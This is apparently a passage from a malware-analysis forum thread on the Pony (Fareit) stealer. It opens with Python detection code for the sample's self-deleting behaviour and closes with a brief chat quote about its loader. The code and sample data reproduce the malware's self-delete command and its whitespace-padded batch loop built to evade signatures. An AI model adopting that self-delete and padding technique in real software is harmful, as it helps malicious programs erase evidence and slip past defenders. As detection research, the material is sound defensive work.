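The self-deletion logic listed in the diff above (the `%COMSPEC% /c del "<self>" > NUL` child started suspended at idle priority, and the whitespace-padded `:ktk` batch loop kept in szBatchFile) is the part of this change set a defender can most directly turn into detection. The Python below is an added example, not code from the post or from the Pony source: it flags process-creation events in which cmd.exe is deleting its own parent image, and it normalizes batch content so the padded loop matches its canonical `del %1 / if exist %1 goto / del %0` shape regardless of the tab, space and stray CR padding. The event schema (`image`, `command_line`, `parent_image`), the sample events and the helper names (`check_process_event`, `scan_events`, `normalize_batch`, `check_batch_content`) are assumptions made for this example; the sample batch text is assembled from the `db` sequence shown in the post.

```python
"""Detection helpers for the Pony 2.0 self-delete paths described above.
Added example, not part of the forum post or the Pony source."""
import re
from typing import Optional

# (1) COMSPEC variant. szSelfCommand yields '%COMSPEC% /c del "<own path>" > NUL';
#     in process-creation telemetry that is a cmd.exe whose parent image is the
#     very file being deleted.
SELF_DEL_CMD = re.compile(
    r'^\s*"?(?P<shell>[^"\s]*cmd\.exe)"?\s+/c\s+del\s+"(?P<target>[^"]+)"\s*>\s*nul\s*$',
    re.IGNORECASE,
)
# GetShortPathName turns the own path into an 8.3 alias (JOHNDO~1 etc.), so the
# target often does not equal the parent image string; a '~<digits>' component is the tell.
SHORT_NAME = re.compile(r'~\d+(?=[\\.]|$)')


def _norm(path: str) -> str:
    """Case-fold and unify separators so Windows paths compare sanely."""
    return path.strip().strip('"').lower().replace('/', '\\')


def check_process_event(event: dict) -> Optional[dict]:
    """Return a finding if this cmd.exe event deletes its parent image, else None.
    Expected keys (constructed schema): image, command_line, parent_image."""
    if not event.get("image", "").lower().endswith("cmd.exe"):
        return None
    m = SELF_DEL_CMD.match(event.get("command_line", ""))
    if not m:
        return None
    target, parent = _norm(m.group("target")), _norm(event.get("parent_image", ""))
    short = bool(SHORT_NAME.search(target))
    same = target == parent
    # Exact parent match is the clean case; an 8.3 alias cannot be resolved
    # offline, so a silent delete of a short-name path is rated high as well.
    severity = "high" if (same or short) else "low"
    return {"rule": "self_delete_comspec", "severity": severity,
            "target": target, "parent": parent, "short_name": short}


def scan_events(events) -> list:
    """Run check_process_event over an iterable of events, keeping the hits."""
    return [f for f in map(check_process_event, events) if f]


# (2) Batch variant. szBatchFile pads the classic loop ':label / del %1 /
#     if exist %1 goto label / del %0' with tabs, spaces and a stray CR so a
#     literal signature fails; collapsing whitespace runs restores the shape.
BATCH_LOOP = re.compile(
    r':(?P<label>\w+)\s+del\s+%1\s+if\s+exist\s+%1\s+goto\s+(?P=label)\s+del\s+%0',
    re.IGNORECASE,
)


def normalize_batch(text: str) -> str:
    """Collapse every run of whitespace (CR, LF, TAB, space) and NULs to one space."""
    return re.sub(r'[\s\x00]+', ' ', text).strip()


def check_batch_content(text: str) -> Optional[dict]:
    """Return a finding if the normalized batch text contains the self-delete loop."""
    m = BATCH_LOOP.search(normalize_batch(text))
    return {"rule": "self_delete_batch_loop", "label": m.group("label")} if m else None


# Constructed sample input. The batch text follows the db sequence in the post
# (13,10 = CRLF, 9 = TAB, trailing 0 = NUL); the events are invented for the example.
SAMPLE_BATCH = (
    "\r\n\t\t\r\n\r\n\t   :ktk   \r\n\r\n\r\n     del    \t %1  \r\n\tif  \t\t exist \t"
    "   %1  \t  goto \t\r ktk\r\n del \t  %0 \x00"
)
SAMPLE_EVENTS = [
    {  # parent spawns cmd.exe to delete its own 8.3-aliased path
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": r'C:\Windows\system32\cmd.exe /c del "C:\Users\JOHNDO~1\AppData\Local\Temp\upd.exe" > NUL',
        "parent_image": r"C:\Users\johndoe\AppData\Local\Temp\upd.exe",
    },
    {  # benign cleanup of a log file by a build tool: same shape, not its parent
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": r'cmd.exe /c del "C:\build\out\old.log" > NUL',
        "parent_image": r"C:\Program Files\Git\usr\bin\make.exe",
    },
    {  # unrelated cmd.exe invocation
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": r"cmd.exe /c dir C:\Users",
        "parent_image": r"C:\Windows\explorer.exe",
    },
]

if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
    print(check_batch_content(SAMPLE_BATCH))
```

Two design points follow from the diff itself. Because the sample passes its own path through GetShortPathName before formatting szSelfCommand, a rule that only compares the `del` target with the parent image string by equality will miss the hit; the short-name heuristic above closes that gap at the cost of resolving the alias on the host when triage needs certainty. The batch normalizer deliberately treats the NUL terminator and the CR before `ktk` as whitespace, since those bytes are exactly what breaks a naive substring match on the listed string.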

grum
Posts: 38
Joined: Tue Nov 06, 2012 12:16 pm

Re: Win32/Fareit

Post by grum » Fri Jun 27, 2014 4:29 pm

Image
Image

++ loader really working?

<Pony>jup memory loading does work indeed, but server side is not implemented, fake only. :D
<Pony>it's missing everything except initial interface code :roll:
